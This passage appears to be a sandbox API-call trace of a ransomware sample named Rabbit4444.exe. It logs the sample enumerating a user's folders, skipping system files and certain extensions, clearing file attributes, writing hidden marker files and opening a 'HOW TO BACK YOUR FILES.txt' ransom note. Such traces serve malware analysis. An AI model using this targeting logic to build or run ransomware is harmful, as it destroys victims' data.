lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.002] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0071.002] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.003] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x235399a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x25417c04, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xf3a41ec4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.003] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.003] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.003] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0071.003] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.003] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.003] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3a41ec4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3a41ec4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3a41ec4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0071.003] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.003] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0071.003] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2379bfc, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x2379bfc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa42c0808, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0071.003] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.003] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0071.003] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.003] lstrlenW (lpString="eventbeacons.dat") returned 16 [0071.003] lstrlenW (lpString="Rabbit4444") returned 10 [0071.003] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.004] lstrlenW (lpString=".dll") returned 4 [0071.004] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.004] lstrlenW (lpString=".lnk") returned 4 [0071.004] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.004] lstrlenW (lpString=".ini") returned 4 [0071.004] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.004] lstrlenW (lpString=".sys") returned 4 [0071.004] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.004] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x235399a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x235399a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa429a5cb, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0071.004] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.004] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0071.004] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.004] lstrlenW (lpString="imprbeacons.dat") returned 15 [0071.004] lstrlenW (lpString="Rabbit4444") returned 10 [0071.005] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.005] lstrlenW (lpString=".dll") returned 4 [0071.005] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.005] lstrlenW (lpString=".lnk") returned 4 [0071.005] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.005] lstrlenW (lpString=".ini") returned 4 [0071.005] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.005] lstrlenW (lpString=".sys") returned 4 [0071.005] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.005] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x235399a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x235399a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa429a5cb, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0071.005] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0071.005] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0071.005] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243292\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\243292\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0071.007] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0071.007] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0071.007] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.007] CloseHandle (hObject=0x260) returned 1 [0071.007] CloseHandle (hObject=0x228) returned 1 [0071.008] GetCurrentThreadId () returned 0xd98 [0071.008] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0071.008] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289" [0071.008] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db98 | out: hHeap=0xe0000) returned 1 [0071.008] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0071.008] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289" [0071.008] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\" [0071.008] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\.BFC0E91B00AE8A0620D3" [0071.008] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\243289\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0071.011] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0071.013] FlushFileBuffers (hFile=0x228) returned 1 [0071.014] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0071.014] CloseHandle (hObject=0x228) returned 1 [0071.015] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289") returned 142 [0071.015] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.015] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb619b0e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xaa6b70e0, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf3a68358, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0071.015] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.015] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.015] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0071.015] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.015] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb619b0e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xaa6b70e0, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf3a68358, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.015] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.015] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.015] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3a68358, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3a68358, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3a68358, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0071.015] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.015] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0071.015] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb63fd86, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xfb63fd86, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xa06de074, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0071.015] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.015] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.015] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.015] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0071.015] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0071.016] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0071.016] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0071.016] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.016] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0071.016] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0071.016] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.016] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0071.016] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.016] lstrlenW (lpString="eventbeacons.dat") returned 16 [0071.016] lstrlenW (lpString="Rabbit4444") returned 10 [0071.016] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.016] lstrlenW (lpString=".dll") returned 4 [0071.016] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.016] lstrlenW (lpString=".lnk") returned 4 [0071.016] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.016] lstrlenW (lpString=".ini") returned 4 [0071.016] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.016] lstrlenW (lpString=".sys") returned 4 [0071.016] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.016] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb63fd86, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xa96e116a, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa06de074, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0071.016] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0071.016] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.016] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0071.016] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0071.016] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0071.017] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0071.017] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0071.017] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0071.017] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0071.017] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0071.017] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0071.017] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0071.017] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0071.017] lstrlenW (lpString="imprbeacons.dat") returned 15 [0071.017] lstrlenW (lpString="Rabbit4444") returned 10 [0071.017] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0071.017] lstrlenW (lpString=".dll") returned 4 [0071.017] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0071.017] lstrlenW (lpString=".lnk") returned 4 [0071.017] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0071.017] lstrlenW (lpString=".ini") returned 4 [0071.017] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0071.017] lstrlenW (lpString=".sys") returned 4 [0071.017] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0071.017] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb63fd86, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xa96e116a, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa06de074, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0071.017] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0071.017] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0071.017] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\243289\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\243289\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0071.018] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0071.018] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0071.018] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.019] CloseHandle (hObject=0x260) returned 1 [0071.019] CloseHandle (hObject=0x228) returned 1 [0071.019] GetCurrentThreadId () returned 0xd98 [0071.019] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0071.019] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513" [0071.019] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da70 | out: hHeap=0xe0000) returned 1 [0071.019] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0071.019] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513" [0071.019] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\" [0071.019] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\.BFC0E91B00AE8A0620D3" [0071.019] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\214513\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0071.023] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0071.025] FlushFileBuffers (hFile=0x228) returned 1 [0071.026] SetFileAttributesW 